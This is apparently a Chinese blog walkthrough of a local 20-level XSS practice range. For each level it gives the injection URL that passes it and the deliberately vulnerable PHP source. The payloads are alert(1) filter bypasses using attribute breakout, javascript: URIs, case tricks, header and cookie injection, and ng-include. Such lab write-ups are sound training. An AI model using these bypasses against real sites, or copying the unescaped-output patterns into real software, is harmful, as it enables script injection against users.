xss靶场练习(二)之xss小游戏
2024-05-12 22:11:43
前言
话说自从网络安全修正法推出, 不敢轻易动国内的网站, 平时就打打靶场, 本文记录练习之路。
xss小游戏在线地址: http://test.ctf8.com/
xss小游戏一共二十关。
为了方便, 我把项目copy在本地。
为了方便实战效果和理解, 本文采用先通关再展示源码的排版方式。
Leve-1
有一个参数name:
再看看name在html源码中的位置:
可以看到位于h2标签中, 故可以直接注入xss攻击:
http://localhost/xss_games/level1.php
?name=<script>alert(1)</script>
点击确定自动location到下一关:
- 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level2.php?keyword=test";
}
</script>
<title>欢迎来到level1</title>
</head>
<body>
<h1 align=center>欢迎来到level1</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
<center><img src=level1.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>Level-2
第二关随便输入一个搜索值:
观察在网页的生成位置:
发现输入的值在input标签中, 我们闭合input标签即可:
http://localhost/xss_games/level2.php
?keyword=hack"><script>alert(1)</script>
- 源码
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level3.php?writing=wait";
}
</script>
<title>欢迎来到level2</title>
</head>
<body>
<h1 align=center>欢迎来到level2</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>
<center><img src=level2.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
Level-3
和上一题一样, 随意输入一个值来观察情况:
继续尝试闭合绕过:
http://localhost/xss_games/level3.php
?keyword=what"><script>alert(1)</script>
&submit=搜索
发现没有闭合出去, 可能是被转义或者编码过,
既然出不去, 那可以在input标签里加属性来xss:
http://localhost/xss_games/level3.php
?keyword=what" onfocus=alert(1)
&submit=搜索
发现还是不对....value值的双引号都没闭合出去。
这里不得其解, 看了下答案, 原来是源码中用了 htmlspecialchars()函数: 过滤一些特殊字符
- htmlspecialchars (string, quotestyle, character-set)
把一些预定义的字符转换为 HTML 实体。
预定义的字符是:
& (和号) 成为 &
" (双引号) 成为 "
' (单引号) 成为 ' (默认是不包括单引号的, 要打开)
< (小于) 成为 <
> (大于) 成为 >
其中, quotestyle参数如下:
| quotestyle |
可选。规定如何编码单引号和双引号。
|
所以我们用双引号闭合时, 双引号会被转义成HTML实体。
由于htmlspecialchars()函数默认状态是只过滤双引号的, "放过"了单引号, 所以可以用单引号来闭合他:
然后发现还多出一个单引号 (至于为什么, 源码部分会解释), 我们用 // 把它注释掉:
http://localhost/xss_games/level3.php
?keyword=hack' onfocus=alert(1)//
&submit=搜索
- 源码
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level4.php?keyword=try harder!";
}
</script>
<title>欢迎来到level3</title>
</head>
<body>
<h1 align=center>欢迎来到level3</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>
<center><img src=level3.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
看关键部分:
<input name=keyword value='".htmlspecialchars($str)."'>可以看到, value的值被单引号闭合起来, 至于双引号, 是通过 . (php的字符串连接符)与处理过后的str连接的, 这样才得以在前端的网页中显示出如下效果:
所以实质上我们用单引号闭合就可以往input里加属性了 (类似sql注入), 最后尾部剩下的单引号记得注释掉。
Level-4
测试一下:
继续尝试绕过闭合:
发现< >被过滤了, 这里可以往input标签里加属性使之弹窗: (这里要处理双引号闭合的问题)
http://localhost/xss_games/level4.php
?keyword=test" onfocus="alert(1)
&submit=搜索
- 源码
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level5.php?keyword=find a way out!";
}
</script>
<title>欢迎来到level4</title>
</head>
<body>
<h1 align=center>欢迎来到level4</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level4.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str3)."</h3>";
?>
</body>
</html>
可以看到, 对str3参数没有作任何过滤, 故直接注入即可。
Level-5
尝试绕过闭合, 加script标签:
发现script被替换成scr_ipt了:
然后用onerror或者onfocus事件也是被替换了, 估计是对关键字on和script做了替换
不过"条条大路通罗马", 可以用<a href=..></a>标签:
http://localhost/xss_games/level5.php
?keyword=hack"><a href=javascript:alert(1)>xss</a>
&submit=搜索过滤规则只是匹配script, 而javascript刚好可以绕过:
- 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level6.php?keyword=break it out!";
}
</script>
<title>欢迎来到level5</title>
</head>
<body>
<h1 align=center>欢迎来到level5</h1>
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level5.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str3)."</h3>";
?>
</body>
</html>
可以看到, 服务端将script和on关键字替换了。
Level-6
这关经过测试, 看到和上一关差不多, 尝试<a href=..></a>标签:
发现href被过滤了, 而且script和on关键字也是过滤的。
这里我们发现可以用大小写过滤 (可能是服务端没有进行正则式/i的匹配):
http://localhost/xss_games/level6.php
?keyword=hack"><sCript>alert(1)</Script>
&submit=搜索
- 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level7.php?keyword=move up!";
}
</script>
<title>欢迎来到level6</title>
</head>
<body>
<h1 align=center>欢迎来到level6</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level6.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str6)."</h3>";
?>
</body>
</html>
可以看到, 代码对script、on、src、data、href关键字进行了过滤, 但没有过滤大小写。
Level-7
尝试绕过双引号闭合, 然后注入script标签:
发现script标签被替换为空了,
这里我们可以采用双写绕过:
http://localhost/xss_games/level7.php
?keyword=hack"><sscriptcript>alert(1)</scscriptript>
&submit=搜索
Level-8
将输入内容添加到友情链接中:
发现被替换了, 并且接下来发现其他的on、src、data、href关键字都被替换了,
双引号也被编码为html实体了:
于是尝试用html实体编码绕过:
发现script标签不能作为url解码后执行:
- JavaScript协议:
javascript:表示执行的是 javascript脚本, 集体执行是什么就是 : 后面的代码。
这个特殊的协议类型声明了URL的主体是任意的javascript代码,它由javascript的解释器运行。
格式为, JavaScript:URL
当浏览器装载了这样的URL时,它将执行这个URL中包含的javascript代码,并把最后一条javascript语句的字符串值作为新文档的内容显示出来。这个字符串值可以含有HTML标记,并被格式化,其显示与其他装载进浏览器的文档完全相同。
所以我们尝试JavaScript协议:
恩, 很棒, script被替换了
继续用html实体编码绕过: (因为JavaScript:URL的URL字符串值可以含有HTML标记,并被格式化,其显示与其他装载进浏览器的文档完全相同)
http://localhost/xss_games/level8.php
?keyword=javascript:alert(1)
&submit=添加友情链接
- 源码
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level9.php?keyword=not bad!";
}
</script>
<title>欢迎来到level8</title>
</head>
<body>
<h1 align=center>欢迎来到level8</h1>
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?phpecho '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>
<center><img src=level8.jpg></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>
</body>
</html>
Level-9
发现这关和上一关差不多, 继续尝试:
发现不管怎么注入都是提示这个, 应该是采用白名单过滤了,
我们按常理出牌:
发现注入http协议的字段可以成功, 那么我们再注入的xss语句中添加http协议就好了!
http://localhost/xss_games/level9.php
?keyword=javascript:alert(1)/* http://xss */
&submit=添加友情链接
- 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level10.php?keyword=well done!";
}
</script>
<title>欢迎来到level9</title>
</head>
<body>
<h1 align=center>欢迎来到level9</h1>
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';}
else
{echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>
<center><img src=level9.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>
</body>
</html>
可以看到, 源码中进行了是否包含http://字段的判断
Level-10
这关可以看到, 我们输入的keyword内容是在h2标题标签中的, 所以即使闭合出来也只是文本而已, 不能被解释执行:
继续观察网页源码, 发现隐藏有参数值:
于是往url加参数:
http://localhost/xss_games/level10.php
?keyword=hack&t_link=1&t_history&t_sort=3
发现只有t_sort被写入了, 所以注入点就是t_sort参数
将value闭合出去 (类似sql闭合), 然后往input标签里加onfocus就行了, 还要记得将type给显示出来:
http://localhost/xss_games/level10.php
?keyword=hack&t_sort=fuck" type="text" onfocus="alert(1)
- 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level11.php?keyword=good job!";
}
</script>
<title>欢迎来到level10</title>
</head>
<body>
<h1 align=center>欢迎来到level10</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level10.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
可以明确看到, 源码的确应用了t_sort参数
Level-11
这关我们继续观察到有隐藏标签:
继续给url加参数, 看看哪个参数被写入:
发现还是t_sort参数, 继续闭合绕过:
看到注入的内容没有闭合出去, 应该是被转义或者实体化了,
这里可以对t_ref参数下手, 尝试抓包, 添加Referer参数:
可以看到, 注入点找到了, 并且发现没有对Referer的内容进行过滤:
- 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level12.php?keyword=good job!";
}
</script>
<title>欢迎来到level11</title>
</head>
<body>
<h1 align=center>欢迎来到level11</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level11.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
源码对t_sort进行了防御, 而没有对t_ref防御。
Level-12
这关换汤不换药, 只不过注入点在User-Agent:
继续抓包修改即可:
- 源码
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level13.php?keyword=good job!";
}
</script>
<title>欢迎来到level12</title>
</head>
<body>
<h1 align=center>欢迎来到level12</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level12.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>可以看到, 通过 $_SERVER['HTTP_USER_AGENT']调用了请求头中的User-Agent信息。
Level-13
这关就是cookie的xss注入了:
抓包修改cookie绕过闭合:
- 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level14.php";
}
</script>
<title>欢迎来到level13</title>
</head>
<body>
<h1 align=center>欢迎来到level13</h1>
<?php
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level13.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
Level-14
未修复的关卡。(要翻墙)
Level-15
这关比较迷, 没有什么参数传入:
观察网页源码, 发现有一个参数:
但是找不到参数值传入...
(看了源码后, ) 得知传入参数为src:
- ng-include 指令
用于包含外部的 HTML 文件。
包含的内容将作为指定元素的子节点。
ng-include 属性的值可以是一个表达式,返回一个文件名。
默认情况下,包含的文件需要包含在同一个域名下。
- AngularJS中的ng-include:
- 是否是在服务器上运行的。(注意不是服务器上,直接打开HTML文件是不行的)
- 文件路径是否对,如果是同一文件夹中,这样写:(注意其中的“”中间还有个‘’)
- ng-controller="myCtrl"是不是正确,如果没有对应的controller
- 组件
<script src="http://apps.bdimg.com/libs/angular.js/1.4.6/angular.min.js"></script>
fath.html内容:
<head> <meta charset="utf-8"> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.2.0/angular.min.js"></script> </head> <body> <div ng-include="'son.html'"></div> <!-- 路径里面必须带上单引号 --> <!-- 注意:如果 ng-controller没有对应的方法,就不要写了,会报错--> </body>son.html内容:
Hello world当然了, 我们可以随意包含任意一关卡的php代码, 绕过利用那一关的弹窗完成这关:
http://localhost/xss_games/level15.php
?src='level1.php?name=<img src="" onerror=alert(1)>'
(由于FIrefox跳转不了, 我就用Google Chrome来pass了)
- 源码:
<html ng-app>
<head><meta charset="utf-8"><script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.2.0/angular.min.js"></script>
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level16.php?keyword=test";
}
</script>
<title>欢迎来到level15</title>
</head>
<h1 align=center>欢迎来到第15关,自己想个办法走出去吧!</h1>
<p align=center><img src=level15.png></p>
<?php
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>
可以看到, 传入了scr参数
Level-16
输入的keyword在center中间:
接着, 尝试的其他关键字都没过滤, 特殊字符也被实体化了, (空格都不放过):
那么这里可以参考之前的blog: SQL注入--空格绕过姿势
http://localhost/xss_games/level16.php
?keyword=<img%0asrc=""%0aonerror=alert(1)>
- 源码
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level17.php?arg01=a&arg02=b";
}
</script>
<title>欢迎来到level16</title>
</head>
<body>
<h1 align=center>欢迎来到level16</h1>
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script"," ",$str);
$str3=str_replace(" "," ",$str2);
$str4=str_replace("/"," ",$str3);
$str5=str_replace(" "," ",$str4);
echo "<center>".$str5."</center>";
?>
<center><img src=level16.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str5)."</h3>";
?>
</body>
</html>
Level-17
由于我的Firefox版本不支持Swf插件, 所以在Google Chrome上演示:
- <embed>标签
<embed> 标签定义了一个容器,用来嵌入外部应用或者互动程序(插件)。
embed可以用来插入各种多媒体,格式可以是 Swf、Midi、Wav、AIFF、AU、MP3等等,Netscape及新版的IE 都支持。src为音频或视频文件及其路径,可以是相对路径或绝对路径。
支持事件属性;
弹窗方式:
<embed src=level16.png onmouseover=alert(1) width=100% heigth=100%><embed src=1 onerror=alert(1) width=100% heigth=100%><embed src=son.html onmouseover=alert(1) width=100% heigth=100%>当我们注入属性时:
然后我们就可以用onclick事件来弹窗了:
http://localhost/xss_games/level17.php
?arg01=a&arg02=b onfocus=alert(1)
- 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
}
</script>
<title>欢迎来到level17</title>
</head>
<body>
<h1 align=center>欢迎来到level17</h1>
<?php
ini_set("display_errors", 0);
echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>
<h2 align=center>成功后,<a href=level18.php?arg01=a&arg02=b>点我进入下一关</a></h2>
</body>
</html>
Level-18
这关和上一关一样, 用onclick事件:
- 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level19.php?arg01=a&arg02=b";
}
</script>
<title>欢迎来到level18</title>
</head>
<body>
<h1 align=center>欢迎来到level18</h1>
<?php
ini_set("display_errors", 0);
echo "<embed src=xsf02.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>
</body>
</html>
Level-19
这关继续注入事件:
发现需要闭合双引号出去:
很明显没有闭合成功, 可能是被转义或者HTML实体化了
这里涉及到 flash xss, 参看: Flash XSS检测脚本的简单实现
- 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level20.php?arg01=a&arg02=b";
}
</script>
<title>欢迎来到level19</title>
</head>
<body>
<h1 align=center>欢迎来到level19</h1>
<?php
ini_set("display_errors", 0);
echo '<embed src="xsf03.swf?'.htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"]).'" width=100% heigth=100%>';
?>
</body>
</html>
Level-20
也是涉及到flash xss
- 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level21.php?arg01=a&arg02=b";
}
</script>
<title>欢迎来到level20</title>
</head>
<body>
<h1 align=center>欢迎来到level20</h1>
<?php
ini_set("display_errors", 0);
echo '<embed src="xsf04.swf?'.htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"]).'" width=100% heigth=100%>';
?>
</body>
</html>
xss靶场练习(二)之xss小游戏相关推荐
- 二十四点小游戏——C语言实现
二十四点小游戏(C语言实现) 过程笨拙,有很多局限之处,比如对答案的输出有限制,代码行数过多,故仅供思路参考. #include<stdio.h> #include<windows. ...
- Random练习二 猜数字小游戏
import java.util.Random; import java.util.Scanner;/*题目: 用代码模拟猜数字的小游戏.思路: 1.首先需要产生一个随机数字,并且一旦产生不在变化.用 ...
- C++ 游戏开发(二)见缝插针小游戏
见缝插针 见缝插针游戏的规则非常简单,给定一个旋转圆盘,每次按动按键,即可在圆盘上射入一根针,当两个针发生碰撞即挑战失败.胜利条件可以设置射出指定根数后胜利,也可以设置不限根数,以更多的根数作为挑战 ...
- 鹅厂内部干货|微信小游戏开发技术怎么应用?
作者介绍:陈阳(Younger) 2011年加入腾讯,现就职于腾讯游戏增值服务部,负责AMS游戏营销平台,致力于研究和推动Web及大前端相关技术的发展. 一.微信小游戏--H5小游戏及微信小程序 微信 ...
- 微信小游戏开发技术与应用
作者介绍:陈阳(Younger) 2011年加入腾讯,现就职于腾讯游戏增值服务部,负责AMS游戏营销平台,致力于研究和推动Web及大前端相关技术的发展. 一.微信小游戏--H5小游戏及微信小程序 微信 ...
- h5游戏间接转换为微信小游戏
h5小游戏不能直接转换为微信小游戏,但是,已有h5小游戏是可以间接转换为微信小游戏的. 首先,Egret.Cocos.Laya 为了适配小游戏或多或少都修改了一些底层的业务逻辑,所以需要 HTML5 ...
- 微信小游戏越来越「重」,但它能赚钱么?
氪金.直播.上 3D,小游戏已经不「小」了. 说起微信小游戏,外界总会有几个刻板标签. 比如,小游戏只能玩轻度游戏,「跳一跳」.「欢乐斗地主」是典型:小游戏不温不火,「跳一跳」之后似乎再无全民话题的爆 ...
- [小游戏资源] 微信小游戏开发资源目录
一.官方微信小游戏教程 小游戏简易教程 小游戏API大全 小游戏开发工具 小游戏应用商店 二.微信小游戏精品源码 [小游戏源码] 微信小游戏空中射击源码 [小游戏源码] 微信小游戏星途Demo源码 [ ...
- 【转】微信小游戏开发源码_教程_工具_资源最新集合
[小游戏资源] 微信小游戏开发资源目录 一.微信官方游戏教程 小游戏简易教程 小游戏API大全 小游戏开发工具 二.微信小游戏图标资源 Game-icons.net 三.微信小游戏图片资源 Super ...
最新文章
- 深入理解JavaScript系列(23):JavaScript与DOM(上)——也适用于新手
- CSMA/CD--CSMA/CA
- 2006年中国软件收入规模前100家企业名单
- 数据库技术基础:数据库管理系统的功能介绍笔记
- Altera 速度等级
- 字符串时间格式转化-java Unit
- java输出的文本内容不对_java 字符串写入文件后再读出不一样? 有什么解决办法吗?...
- winpe装双系统linux_winPE+ubuntu双系统U盘制作
- 如何利用linux分析转录组数据库,对转录组测序数据进行分析以及注释
- 一文读懂人工智能、机器学习、深度学习、强化学习的关系(必看)
- 80后 最牛的辞职信
- D3.js 生成词云图
- 服务器网页内容修改了不变动,修改服务器网页
- cesium根据两点获取航向角(heading)与俯仰角(pitch)
- [凯圣王]减脂挑战第15天变化/饮食思路分享/碳水循环+轻断食/GI值和GL值的应用/碳水后置的理论基础
- Word2010去除页眉上的横线
- 【国家局发布】医疗器械注册流程及相关法规大全
- Java:pdf转word
- 微信摇一摇插件ios_iOS摇一摇
- 小程序加入人脸识别_微信小程序+人脸识别